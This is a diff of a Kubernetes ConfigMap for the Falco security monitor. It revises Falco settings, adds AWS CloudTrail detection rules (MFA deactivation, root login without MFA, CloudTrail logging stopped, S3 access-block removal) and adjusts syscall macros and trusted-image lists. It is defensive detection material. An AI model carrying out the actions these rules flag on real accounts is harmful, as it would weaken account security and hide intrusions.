messages.\nsyscall_event_drops:\n  actions:\n    - log\n    - alert\n  rate: 0.03333\n  max_burst: 10\n\n# Falco continuously monitors outputs performance. When an output channel does not allow\n# to deliver an alert within a given deadline, an error is reported indicating\n# which output is blocking notifications.\n# The timeout error will be reported to the log according to the above log_* settings.\n# Note that the notification will not be discarded from the output queue; thus,\n# output channels may indefinitely remain blocked.\n# An output timeout error indeed indicate a misconfiguration issue or I/O problems\n# that cannot be recovered by Falco and should be fixed by the user.\n#\n# The \"output_timeout\" value specifies the duration in milliseconds to wait before\n# considering the deadline exceed.\n#\n# With a 2000ms default, the notification consumer can block the Falco output\n# for up to 2 seconds without reaching the timeout.\n\noutput_timeout: 2000\n\n# A throttling mechanism implemented as a token bucket limits the\n# rate of falco notifications. This throttling is controlled by the following configuration\n# options:\n#  - rate: the number of tokens (i.e. right to send a notification)\n#    gained per second. Defaults to 1.\n#  - max_burst: the maximum number of tokens outstanding. Defaults to 1000.\n#\n# With these defaults, falco could send up to 1000 notifications after\n# an initial quiet period, and then up to 1 notification per second\n# afterward. It would gain the full burst back after 1000 seconds of\n# no activity.\noutputs:\n  rate: 1\n  max_burst: 1000\n\n# Where security notifications should go.\n# Multiple outputs can be enabled.\n\nsyslog_output:\n  enabled: true\n\n# If keep_alive is set to true, the file will be opened once and\n# continuously written to, with each output message on its own\n# line. If keep_alive is set to false, the file will be re-opened\n# for each output message.\n#\n# Also, the file will be closed and reopened if falco is signaled with\n# SIGUSR1.\n\nfile_output:\n  enabled: false\n  keep_alive: false\n  filename: ./events.txt\n\nstdout_output:\n  enabled: true\n\n# Falco contains an embedded webserver that can be used to accept K8s\n# Audit Events. These config options control the behavior of that\n# webserver. (By default, the webserver is disabled).\n#\n# The ssl_certificate is a combination SSL Certificate and corresponding\n# key contained in a single file. You can generate a key/cert as follows:\n#\n# $ openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem\n# $ cat certificate.pem key.pem > falco.pem\n# $ sudo cp falco.pem /etc/falco/falco.pem\n\nwebserver:\n  enabled: true\n  listen_port: 8765\n  k8s_audit_endpoint: /k8s-audit\n  k8s_healthz_endpoint: /healthz\n  ssl_enabled: false\n  ssl_certificate: /etc/falco/certs/server.pem\n\n# Possible additional things you might want to do with program output:\n#   - send to a slack webhook:\n#         program: \"\\\"jq '{text: .output}' | curl -d @- -X POST https://hooks.slack.com/services/XXX\\\"\"\n#   - logging (alternate method than syslog):\n#         program: logger -t falco-test\n#   - send over a network connection:\n#         program: nc host.example.com 80\n\n# If keep_alive is set to true, the program will be started once and\n# continuously written to, with each output message on its own\n# line. If keep_alive is set to false, the program will be re-spawned\n# for each output message.\n#\n# Also, the program will be closed and reopened if falco is signaled with\n# SIGUSR1.\nprogram_output:\n  enabled: false\n  keep_alive: false\n  program: |\n    mail -s \"Falco Notification\" someone@example.com\n\nhttp_output:\n  enabled: true\n  url: http://falco-sidekick-falcosidekick:2801\n\ngrpc:\n  enabled: true\n  threadiness: 0\n  bind_address: \"unix:///var/run/falco/falco.sock\"\n  \n\ngrpc_output:\n  enabled: true\n\n# Container orchestrator metadata fetching params\nmetadata_download:\n  max_mb: 100\n  chunk_wait_us: 1000\n  watch_freq_sec: 1"
+  falco.yaml: "# File(s) or Directories containing Falco rules, loaded at startup.\n# The name \"rules_file\" is only for backwards compatibility.\n# If the entry is a file, it will be read directly. If the entry is a directory,\n# every file in that directory will be read, in alphabetical order.\n#\n# falco_rules.yaml ships with the falco package and is overridden with\n# every new software version. falco_rules.local.yaml is only created\n# if it doesn't exist. If you want to customize the set of rules, add\n# your customizations to falco_rules.local.yaml.\n#\n# The files will be read in the order presented here, so make sure if\n# you have overrides they appear in later files.\nrules_file:\n  - /etc/falco/falco_rules.yaml\n  - /etc/falco/falco_rules.local.yaml\n  - /etc/falco/rules.d\n\nplugins:\n    - init_config: \"\"\n      library_path: libk8saudit.so\n      name: k8saudit\n      open_params: http://:9765/k8s-audit\n    - init_config: \"\"\n      library_path: libcloudtrail.so\n      name: cloudtrail\n      open_params: \"\"\n    - init_config: \"\"\n      library_path: libjson.so\n      name: json\n\n# Setting this list to empty ensures that the above plugins are *not*\n# loaded and enabled by default. If you want to use the above plugins,\n# set a meaningful init_config/open_params for the cloudtrail plugin\n# and then change this to:\n# load_plugins: [cloudtrail, json]\nload_plugins:\n    []\n# Watch config file and rules files for modification.\n# When a file is modified, Falco will propagate new config,\n# by reloading itself.\nwatch_config_files: true\n\n# If true, the times displayed in log messages and output messages\n# will be in ISO 8601. By default, times are displayed in the local\n# time zone, as governed by /etc/localtime.\ntime_format_iso_8601: false\n\n# Whether to output events in json or text\njson_output: true\n\n# When using json output, whether or not to include the \"output\" property\n# itself (e.g. \"File below a known binary directory opened for writing\n# (user=root ....\") in the json output.\njson_include_output_property: true\n\n# When using json output, whether or not to include the \"tags\" property\n# itself in the json output. If set to true, outputs caused by rules\n# with no tags will have a \"tags\" field set to an empty array. If set to\n# false, the \"tags\" field will not be included in the json output at all.\njson_include_tags_property: true\n\n# Send information logs to stderr and/or syslog Note these are *not* security\n# notification logs! These are just Falco lifecycle (and possibly error) logs.\nlog_stderr: true\nlog_syslog: true\n\n# Minimum log level to include in logs. Note: these levels are\n# separate from the priority field of rules. This refers only to the\n# log level of falco's internal logging. Can be one of \"emergency\",\n# \"alert\", \"critical\", \"error\", \"warning\", \"notice\", \"info\", \"debug\".\nlog_level: info\n\n# Minimum rule priority level to load and run. All rules having a\n# priority more severe than this level will be loaded/run.  Can be one\n# of \"emergency\", \"alert\", \"critical\", \"error\", \"warning\", \"notice\",\n# \"info\", \"debug\".\npriority: debug\n\n# Whether or not output to any of the output channels below is\n# buffered. Defaults to false\nbuffered_outputs: false\n\n# Falco uses a shared buffer between the kernel and userspace to pass\n# system call information. When Falco detects that this buffer is\n# full and system calls have been dropped, it can take one or more of\n# the following actions:\n#   - ignore: do nothing (default when list of actions is empty)\n#   - log: log a DEBUG message noting that the buffer was full\n#   - alert: emit a Falco alert noting that the buffer was full\n#   - exit: exit Falco with a non-zero rc\n#\n# Notice it is not possible to ignore and log/alert messages at the same time.\n#\n# The rate at which log/alert messages are emitted is governed by a\n# token bucket. The rate corresponds to one message every 30 seconds\n# with a burst of one message (by default).\n#\n# The messages are emitted when the percentage of dropped system calls\n# with respect the number of events in the last second\n# is greater than the given threshold (a double in the range [0, 1]).\n#\n# For debugging/testing it is possible to simulate the drops using\n# the `simulate_drops: true`. In this case the threshold does not apply.\nsyscall_event_drops:\n  threshold: 0.1\n  actions:\n    - log\n    - alert\n  rate: 0.03333\n  max_burst: 1\n\n# Falco uses a shared buffer between the kernel and userspace to receive\n# the events (eg., system call information) in userspace.\n#\n# Anyways, the underlying libraries can also timeout for various reasons.\n# For example, there could have been issues while reading an event.\n# Or the particular event needs to be skipped.\n# Normally, it's very unlikely that Falco does not receive events consecutively.\n#\n# Falco is able to detect such uncommon situation.\n#\n# Here you can configure the maximum number of consecutive timeouts without an event\n# after which you want Falco to alert.\n# By default this value is set to 1000 consecutive timeouts without an event at all.\n# How this value maps to a time interval depends on the CPU frequency.\nsyscall_event_timeouts:\n  max_consecutives: 1000\n\n# Falco continuously monitors outputs performance. When an output channel does not allow\n# to deliver an alert within a given deadline, an error is reported indicating\n# which output is blocking notifications.\n# The timeout error will be reported to the log according to the above log_* settings.\n# Note that the notification will not be discarded from the output queue; thus,\n# output channels may indefinitely remain blocked.\n# An output timeout error indeed indicate a misconfiguration issue or I/O problems\n# that cannot be recovered by Falco and should be fixed by the user.\n#\n# The \"output_timeout\" value specifies the duration in milliseconds to wait before\n# considering the deadline exceed.\n#\n# With a 2000ms default, the notification consumer can block the Falco output\n# for up to 2 seconds without reaching the timeout.\noutput_timeout: 2000\n\n# A throttling mechanism implemented as a token bucket limits the\n# rate of falco notifications. This throttling is controlled by the following configuration\n# options:\n#  - rate: the number of tokens (i.e. right to send a notification)\n#    gained per second. Defaults to 1.\n#  - max_burst: the maximum number of tokens outstanding. Defaults to 1000.\n#\n# With these defaults, falco could send up to 1000 notifications after\n# an initial quiet period, and then up to 1 notification per second\n# afterward. It would gain the full burst back after 1000 seconds of\n# no activity.\noutputs:\n  rate: 1\n  max_burst: 1000\n\n# Where security notifications should go.\n# Multiple outputs can be enabled.\nsyslog_output:\n  enabled: true\n\n# If keep_alive is set to true, the file will be opened once and\n# continuously written to, with each output message on its own\n# line. If keep_alive is set to false, the file will be re-opened\n# for each output message.\n#\n# Also, the file will be closed and reopened if falco is signaled with\n# SIGUSR1.\nfile_output:\n  enabled: false\n  keep_alive: false\n  filename: ./events.txt\n\nstdout_output:\n  enabled: true\n\n# Falco contains an embedded webserver that can be used to accept K8s\n# Audit Events. These config options control the behavior of that\n# webserver. (By default, the webserver is disabled).\n#\n# The ssl_certificate is a combination SSL Certificate and corresponding\n# key contained in a single file. You can generate a key/cert as follows:\n#\n# $ openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem\n# $ cat certificate.pem key.pem > falco.pem\n# $ sudo cp falco.pem /etc/falco/falco.pem\nwebserver:\n  enabled: true\n  listen_port: 8765\n  k8s_healthz_endpoint: /healthz\n  ssl_enabled: false\n  ssl_certificate: /etc/falco/certs/falco.pem\n\n# If keep_alive is set to true, the program will be started once and\n# continuously written to, with each output message on its own\n# line. If keep_alive is set to false, the program will be re-spawned\n# for each output message.\n#\n# Also, the program will be closed and reopened if falco is signaled with\n# SIGUSR1.\nprogram_output:\n  enabled: false\n  keep_alive: false\n  program: |\n    mail -s \"Falco Notification\" someone@example.com\n\nhttp_output:\n  enabled: true\n  url: 'http://falco-sidekick-falcosidekick:2801'\n  user_agent: falcosecurity/falco\n\n\n# Falco supports running a gRPC server with two main binding types\n# 1. Over the network with mandatory mutual TLS authentication (mTLS)\n# 2. Over a local unix socket with no authentication\n# By default, the gRPC server is disabled, with no enabled services (see grpc_output)\n# please comment/uncomment and change accordingly the options below to configure it.\n# Important note: if Falco has any troubles creating the gRPC server\n# this information will be logged, however the main Falco daemon will not be stopped.\n# gRPC server over network with (mandatory) mutual TLS configuration.\n# This gRPC server is secure by default so you need to generate certificates and update their paths here.\n# By default the gRPC server is off.\n# You can configure the address to bind and expose it.\n# By modifying the threadiness configuration you can fine-tune the number of threads (and context) it will use.\n# grpc:\n#   enabled: true\n#   bind_address: \"0.0.0.0:5060\"\n#   # when threadiness is 0, Falco sets it by automatically figuring out the number of online cores\n#   threadiness: 0\n#   private_key: \"/etc/falco/certs/server.key\"\n#   cert_chain: \"/etc/falco/certs/server.crt\"\n#   root_certs: \"/etc/falco/certs/ca.crt\"\ngrpc:\n  enabled: true\n  threadiness: 0\n  bind_address: \"unix:///var/run/falco/falco.sock\"\n  \n\n# gRPC output service.\n# By default it is off.\n# By enabling this all the output events will be kept in memory until you read them with a gRPC client.\n# Make sure to have a consumer for them or leave this disabled.\ngrpc_output:\n  enabled: true\n\n# Container orchestrator metadata fetching params\nmetadata_download:\n  max_mb: 100\n  chunk_wait_us: 1000\n  watch_freq_sec: 1"
   application_rules.yaml: |-
     #
     # Copyright (C) 2019 The Falco Authors.
@@ -343,6 +343,447 @@
     #   condition: proc.name in (http_server_binaries) and inbound and fd.sport != 80 and fd.sport != 443
     #   output: "Inbound network traffic to HTTP Server on unexpected port (connection=%fd.name)"
     #   priority: WARNING
+  aws_cloudtrail_rules.yaml: |+
+    #
+    # Copyright (C) 2022 The Falco Authors.
+    #
+    #
+    # Licensed under the Apache License, Version 2.0 (the "License");
+    # you may not use this file except in compliance with the License.
+    # You may obtain a copy of the License at
+    #
+    #     http://www.apache.org/licenses/LICENSE-2.0
+    #
+    # Unless required by applicable law or agreed to in writing, software
+    # distributed under the License is distributed on an "AS IS" BASIS,
+    # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+    # See the License for the specific language governing permissions and
+    # limitations under the License.
+    #
+
+    # All rules files related to plugins should require at least engine version 10
+    - required_engine_version: 10
+
+    - required_plugin_versions:
+      - name: cloudtrail
+        version: 0.2.3
+      - name: json
+        version: 0.2.2
+
+    # Note that this rule is disabled by default. It's useful only to
+    # verify that the cloudtrail plugin is sending events properly.  The
+    # very broad condition evt.num > 0 only works because the rule source
+    # is limited to aws_cloudtrail. This ensures that the only events that
+    # are matched against the rule are from the cloudtrail plugin (or
+    # a different plugin with the same source).
+    - rule: All Cloudtrail Events
+      desc: Match all cloudtrail events.
+      condition:
+        evt.num > 0
+      output: Some Cloudtrail Event (evtnum=%evt.num info=%evt.plugininfo ts=%evt.time.iso8601 id=%ct.id error=%ct.error)
+      priority: DEBUG
+      tags:
+      - cloud
+      - aws
+      source: aws_cloudtrail
+      enabled: false
+
+    - rule: Console Login Through Assume Role
+      desc: Detect a console login through Assume Role.
+      condition:
+        ct.name="ConsoleLogin" and not ct.error exists
+        and ct.user.identitytype="AssumedRole"
+        and json.value[/responseElements/ConsoleLogin]="Success"
+      output:
+        Detected a console login through Assume Role
+        (principal=%ct.user.principalid,
+        assumedRole=%ct.user.arn,
+        requesting IP=%ct.srcip,
+        AWS region=%ct.region)
+      priority: WARNING
+      tags:
+      - cloud
+      - aws
+      - aws_console
+      - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Console Login Without MFA
+      desc: Detect a console login without MFA.
+      condition:
+        ct.name="ConsoleLogin" and not ct.error exists
+        and ct.user.identitytype!="AssumedRole"
+        and json.value[/responseElements/ConsoleLogin]="Success"
+        and json.value[/additionalEventData/MFAUsed]="No"
+      output:
+        Detected a console login without MFA
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_console
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Console Root Login Without MFA
+      desc: Detect root console login without MFA.
+      condition:
+        ct.name="ConsoleLogin" and not ct.error exists
+        and json.value[/additionalEventData/MFAUsed]="No"
+        and ct.user.identitytype!="AssumedRole"
+        and json.value[/responseElements/ConsoleLogin]="Success"
+        and ct.user.identitytype="Root"
+      output:
+        Detected a root console login without MFA.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_console
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Deactivate MFA for Root User
+      desc: Detect deactivating MFA configuration for root.
+      condition:
+        ct.name="DeactivateMFADevice" and not ct.error exists
+        and ct.user.identitytype="Root"
+        and ct.request.username="AWS ROOT USER"
+      output:
+        Multi Factor Authentication configuration has been disabled for root
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         MFA serial number=%ct.request.serialnumber)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Create AWS user
+      desc: Detect creation of a new AWS user.
+      condition:
+        ct.name="CreateUser" and not ct.error exists
+      output:
+        A new AWS user has been created
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         new user created=%ct.request.username)
+      priority: INFO
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Create Group
+      desc: Detect creation of a new user group.
+      condition:
+        ct.name="CreateGroup" and not ct.error exists
+      output:
+        A new user group has been created.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         group name=%ct.request.groupname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Delete Group
+      desc: Detect deletion of a user group.
+      condition:
+        ct.name="DeleteGroup" and not ct.error exists
+      output:
+        A user group has been deleted.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         group name=%ct.request.groupname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: ECS Service Created
+      desc: Detect a new service is created in ECS.
+      condition:
+        ct.src="ecs.amazonaws.com" and
+        ct.name="CreateService" and
+        not ct.error exists
+      output:
+        A new service has been created in ECS
+        (requesting user=%ct.user,
+        requesting IP=%ct.srcip,
+        AWS region=%ct.region,
+        cluster=%ct.request.cluster,
+        service name=%ct.request.servicename,
+        task definition=%ct.request.taskdefinition)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ecs
+        - aws_fargate
+      source: aws_cloudtrail
+
+    - rule: ECS Task Run or Started
+      desc: Detect a new task is started in ECS.
+      condition:
+        ct.src="ecs.amazonaws.com" and
+        (ct.name="RunTask" or ct.name="StartTask") and
+        not ct.error exists
+      output:
+        A new task has been started in ECS
+        (requesting user=%ct.user,
+        requesting IP=%ct.srcip,
+        AWS region=%ct.region,
+        cluster=%ct.request.cluster,
+        task definition=%ct.request.taskdefinition)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ecs
+        - aws_fargate
+      source: aws_cloudtrail
+
+    - rule: Create Lambda Function
+      desc: Detect creation of a Lambda function.
+      condition:
+        ct.name="CreateFunction20150331" and not ct.error exists
+      output:
+        Lambda function has been created.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         lambda function=%ct.request.functionname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_lambda
+      source: aws_cloudtrail
+
+    - rule: Update Lambda Function Code
+      desc: Detect updates to a Lambda function code.
+      condition:
+        ct.name="UpdateFunctionCode20150331v2" and not ct.error exists
+      output:
+        The code of a Lambda function has been updated.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         lambda function=%ct.request.functionname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_lambda
+      source: aws_cloudtrail
+
+    - rule: Update Lambda Function Configuration
+      desc: Detect updates to a Lambda function configuration.
+      condition:
+        ct.name="UpdateFunctionConfiguration20150331v2" and not ct.error exists
+      output:
+        The configuration of a Lambda function has been updated.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         lambda function=%ct.request.functionname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_lambda
+      source: aws_cloudtrail
+
+    - rule: Run Instances
+      desc: Detect launching of a specified number of instances.
+      condition:
+        ct.name="RunInstances" and not ct.error exists
+      output:
+        A number of instances have been launched.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         availability zone=%ct.request.availabilityzone,
+         subnet id=%ct.response.subnetid,
+         reservation id=%ct.response.reservationid)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ec2
+      source: aws_cloudtrail
+
+    # Only instances launched on regions in this list are approved.
+    - list: approved_regions
+      items:
+        - us-east-0
+
+    - rule: Run Instances in Non-approved Region
+      desc: Detect launching of a specified number of instances in a non-approved region.
+      condition:
+        ct.name="RunInstances" and not ct.error exists and
+        not ct.region in (approved_regions)
+      output:
+        A number of instances have been launched in a non-approved region.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         availability zone=%ct.request.availabilityzone,
+         subnet id=%ct.response.subnetid,
+         reservation id=%ct.response.reservationid,
+         image id=%json.value[/responseElements/instancesSet/items/0/instanceId])
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ec2
+      source: aws_cloudtrail
+
+    - rule: Delete Bucket Encryption
+      desc: Detect deleting configuration to use encryption for bucket storage.
+      condition:
+        ct.name="DeleteBucketEncryption" and not ct.error exists
+      output:
+        A encryption configuration for a bucket has been deleted
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket=%s3.bucket)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: Delete Bucket Public Access Block
+      desc: Detect deleting blocking public access to bucket.
+      condition:
+        ct.name="PutBucketPublicAccessBlock" and not ct.error exists and
+        json.value[/requestParameters/publicAccessBlock]="" and
+          (json.value[/requestParameters/PublicAccessBlockConfiguration/RestrictPublicBuckets]=false or
+          json.value[/requestParameters/PublicAccessBlockConfiguration/BlockPublicPolicy]=false or
+          json.value[/requestParameters/PublicAccessBlockConfiguration/BlockPublicAcls]=false or
+          json.value[/requestParameters/PublicAccessBlockConfiguration/IgnorePublicAcls]=false)
+      output:
+        A public access block for a bucket has been deleted
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket=%s3.bucket)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: List Buckets
+      desc: Detect listing of all S3 buckets.
+      condition:
+        ct.name="ListBuckets" and not ct.error exists
+      output:
+        A list of all S3 buckets has been requested.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         host=%ct.request.host)
+      priority: WARNING
+      enabled: false
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: Put Bucket ACL
+      desc: Detect setting the permissions on an existing bucket using access control lists.
+      condition:
+        ct.name="PutBucketAcl" and not ct.error exists
+      output:
+        The permissions on an existing bucket have been set using access control lists.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket name=%s3.bucket)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: Put Bucket Policy
+      desc: Detect applying an Amazon S3 bucket policy to an Amazon S3 bucket.
+      condition:
+        ct.name="PutBucketPolicy" and not ct.error exists
+      output:
+        An Amazon S3 bucket policy has been applied to an Amazon S3 bucket.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket name=%s3.bucket,
+         policy=%ct.request.policy)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: CloudTrail Trail Created
+      desc: Detect creation of a new trail.
+      condition:
+        ct.name="CreateTrail" and not ct.error exists
+      output:
+        A new trail has been created.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         trail name=%ct.request.name)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_cloudtrail
+      source: aws_cloudtrail
+
+    - rule: CloudTrail Logging Disabled
+      desc: The CloudTrail logging has been disabled, this could be potentially malicious.
+      condition:
+        ct.name="StopLogging" and not ct.error exists
+      output:
+        The CloudTrail logging has been disabled.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         resource name=%ct.request.name)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_cloudtrail
+      source: aws_cloudtrail
+
   falco_rules.local.yaml: |
     #
     # Copyright (C) 2019 The Falco Authors.
@@ -376,7 +817,7 @@
     # Or override/append to any rule, macro, or list from the Default Rules
   falco_rules.yaml: |
     #
-    # Copyright (C) 2020 The Falco Authors.
+    # Copyright (C) 2022 The Falco Authors.
     #
     #
     # Licensed under the Apache License, Version 2.0 (the "License");
@@ -406,13 +847,13 @@
     #   condition: (syscall.type=read and evt.dir=> and fd.type in (file, directory))
 
     - macro: open_write
-      condition: (evt.type=open or evt.type=openat) and evt.is_open_write=true and fd.typechar='f' and fd.num>=0
+      condition: evt.type in (open,openat,openat2) and evt.is_open_write=true and fd.typechar='f' and fd.num>=0
 
     - macro: open_read
-      condition: (evt.type=open or evt.type=openat) and evt.is_open_read=true and fd.typechar='f' and fd.num>=0
+      condition: evt.type in (open,openat,openat2) and evt.is_open_read=true and fd.typechar='f' and fd.num>=0
 
     - macro: open_directory
-      condition: (evt.type=open or evt.type=openat) and evt.is_open_read=true and fd.typechar='d' and fd.num>=0
+      condition: evt.type in (open,openat,openat2) and evt.is_open_read=true and fd.typechar='d' and fd.num>=0
 
     - macro: never_true
       condition: (evt.num=0)
@@ -440,11 +881,14 @@
       condition: rename or remove
 
     - macro: spawned_process
-      condition: evt.type = execve and evt.dir=<
+      condition: evt.type in (execve, execveat) and evt.dir=<
 
     - macro: create_symlink
       condition: evt.type in (symlink, symlinkat) and evt.dir=<
 
+    - macro: create_hardlink
+      condition: evt.type in (link, linkat) and evt.dir=<
+
     - macro: chmod
       condition: (evt.type in (chmod, fchmod, fchmodat) and evt.dir=<)
 
@@ -593,13 +1037,13 @@
     - list: deb_binaries
       items: [dpkg, dpkg-preconfigu, dpkg-reconfigur, dpkg-divert, apt, apt-get, aptitude,
         frontend, preinst, add-apt-reposit, apt-auto-remova, apt-key,
-        apt-listchanges, unattended-upgr, apt-add-reposit, apt-config, apt-cache, apt.systemd.dai
+        apt-listchanges, unattended-upgr, apt-add-reposit, apt-cache, apt.systemd.dai
         ]
 
     # The truncated dpkg-preconfigu is intentional, process names are
-    # truncated at the sysdig level.
+    # truncated at the falcosecurity-libs level.
     - list: package_mgmt_binaries
-      items: [rpm_binaries, deb_binaries, update-alternat, gem, pip, pip3, sane-utils.post, alternatives, chef-client, apk, snapd]
+      items: [rpm_binaries, deb_binaries, update-alternat, gem, npm, pip, pip3, sane-utils.post, alternatives, chef-client, apk, snapd]
 
     - macro: package_mgmt_procs
       condition: proc.name in (package_mgmt_binaries)
@@ -710,7 +1154,7 @@
     # for efficiency.
     - macro: inbound_outbound
       condition: >
-        ((((evt.type in (accept,listen,connect) and evt.dir=<)) or
+        ((((evt.type in (accept,listen,connect) and evt.dir=<)) and
          (fd.typechar = 4 or fd.typechar = 6)) and
          (fd.ip != "0.0.0.0" and fd.net != "127.0.0.0/8") and
          (evt.rawres >= 0 or evt.res = EINPROGRESS))
@@ -817,6 +1261,9 @@
     - list: shell_config_directories
       items: [/etc/zsh]
 
+    - macro: user_known_shell_config_modifiers
+      condition: (never_true)
+
     - rule: Modify Shell Configuration File
       desc: Detect attempt to modify shell configuration files
       condition: >
@@ -826,6 +1273,7 @@
          fd.directory in (shell_config_directories))
         and not proc.name in (shell_binaries)
         and not exe_running_docker_save
+        and not user_known_shell_config_modifiers
       output: >
         a shell configuration file has been modified (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline pcmdline=%proc.pcmdline file=%fd.name container_id=%container.id image=%container.image.repository)
       priority:
@@ -938,7 +1386,7 @@
 
     # Qualys seems to run a variety of shell subprocesses, at various
     # levels. This checks at a few levels without the cost of a full
-    # proc.aname, which traverses the full parent heirarchy.
+    # proc.aname, which traverses the full parent hierarchy.
     - macro: run_by_qualys
       condition: >
         (proc.pname=qualys-cloud-ag or
@@ -1149,6 +1597,9 @@
     - macro: centrify_writing_krb
       condition: (proc.name in (adjoin,addns) and fd.name startswith /etc/krb5)
 
+    - macro: sssd_writing_krb
+      condition: (proc.name=adcli and proc.aname[2]=sssd and fd.name startswith /etc/krb5)
+
     - macro: cockpit_writing_conf
       condition: >
         ((proc.pname=cockpit-kube-la or proc.aname[2]=cockpit-kube-la)
@@ -1477,7 +1928,7 @@
       condition: (proc.name=oc and fd.name startswith /etc/origin/node)
 
     - macro: keepalived_writing_conf
-      condition: (proc.name=keepalived and fd.name=/etc/keepalived/keepalived.conf)
+      condition: (proc.name in (keepalived, kube-keepalived) and fd.name=/etc/keepalived/keepalived.conf)
 
     - macro: etcd_manager_updating_dns
       condition: (container and proc.name=etcd-manager and fd.name=/etc/hosts)
@@ -1592,6 +2043,7 @@
         and not nginx_writing_certs
         and not chef_client_writing_conf
         and not centrify_writing_krb
+        and not sssd_writing_krb
         and not cockpit_writing_conf
         and not ipsec_writing_conf
         and not httpd_writing_ssl_conf
@@ -2181,7 +2633,7 @@
               registry.access.redhat.com/sematext/agent,
               registry.access.redhat.com/sematext/logagent]
 
-    # These container images are allowed to run with --privileged
+    # These container images are allowed to run with --privileged and full set of capabilities
     - list: falco_privileged_images
       items: [
         docker.io/calico/node,
@@ -2199,10 +2651,12 @@
         gke.gcr.io/kube-proxy,
         gke.gcr.io/gke-metadata-server,
         gke.gcr.io/netd-amd64,
+        gke.gcr.io/watcher-daemonset,
         gcr.io/google-containers/prometheus-to-sd,
         k8s.gcr.io/ip-masq-agent-amd64,
         k8s.gcr.io/kube-proxy,
         k8s.gcr.io/prometheus-to-sd,
+        public.ecr.aws/falcosecurity/falco,
         quay.io/calico/node,
         sysdig/sysdig,
         sematext_images
@@ -2231,7 +2685,7 @@
     - list: falco_sensitive_mount_images
       items: [
         docker.io/sysdig/sysdig, sysdig/sysdig,
-        docker.io/falcosecurity/falco, falcosecurity/falco,
+        docker.io/falcosecurity/falco, falcosecurity/falco, public.ecr.aws/falcosecurity/falco,
         gcr.io/google_containers/hyperkube,
         gcr.io/google_containers/kube-proxy, docker.io/calico/node,
         docker.io/rook/toolbox, docker.io/cloudnativelabs/kube-router, docker.io/consul,
@@ -2247,19 +2701,6 @@
                   container.image.repository in (falco_sensitive_mount_images) or
                   container.image.repository startswith quay.io/sysdig/)
 
-    # These container images are allowed to run with hostnetwork=true
-    - list: falco_hostnetwork_images
-      items: [
-        gcr.io/google-containers/prometheus-to-sd,
-        gcr.io/projectcalico-org/typha,
-        gcr.io/projectcalico-org/node,
-        gke.gcr.io/gke-metadata-server,
-        gke.gcr.io/kube-proxy,
-        gke.gcr.io/netd-amd64,
-        k8s.gcr.io/ip-masq-agent-amd64
-        k8s.gcr.io/prometheus-to-sd,
-        ]
-
     # Add conditions to this macro (probably in a separate file,
     # overwriting this macro) to specify additional containers that are
     # allowed to perform sensitive mounts.
@@ -2280,14 +2721,40 @@
       priority: INFO
